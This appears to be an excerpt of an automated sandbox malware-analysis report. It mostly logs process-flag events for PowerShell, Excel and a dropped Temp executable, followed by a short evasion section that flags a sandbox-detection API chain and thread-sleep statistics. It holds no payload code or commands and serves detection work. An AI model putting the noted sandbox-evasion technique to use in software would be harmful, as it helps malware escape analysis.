Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\a.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_5-101074

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4727	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5141	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6435	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2977	Jump to behavior
Source: C:\Windows\splwow64.exe	Window / User API: threadDelayed 506

Source: C:\Users\user\AppData\Local\Temp\a.exe

API coverage: 4.6 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep count: 4727 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064	Thread sleep count: 5141 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7376	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 6435 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 2977 > 30	Jump to behavior
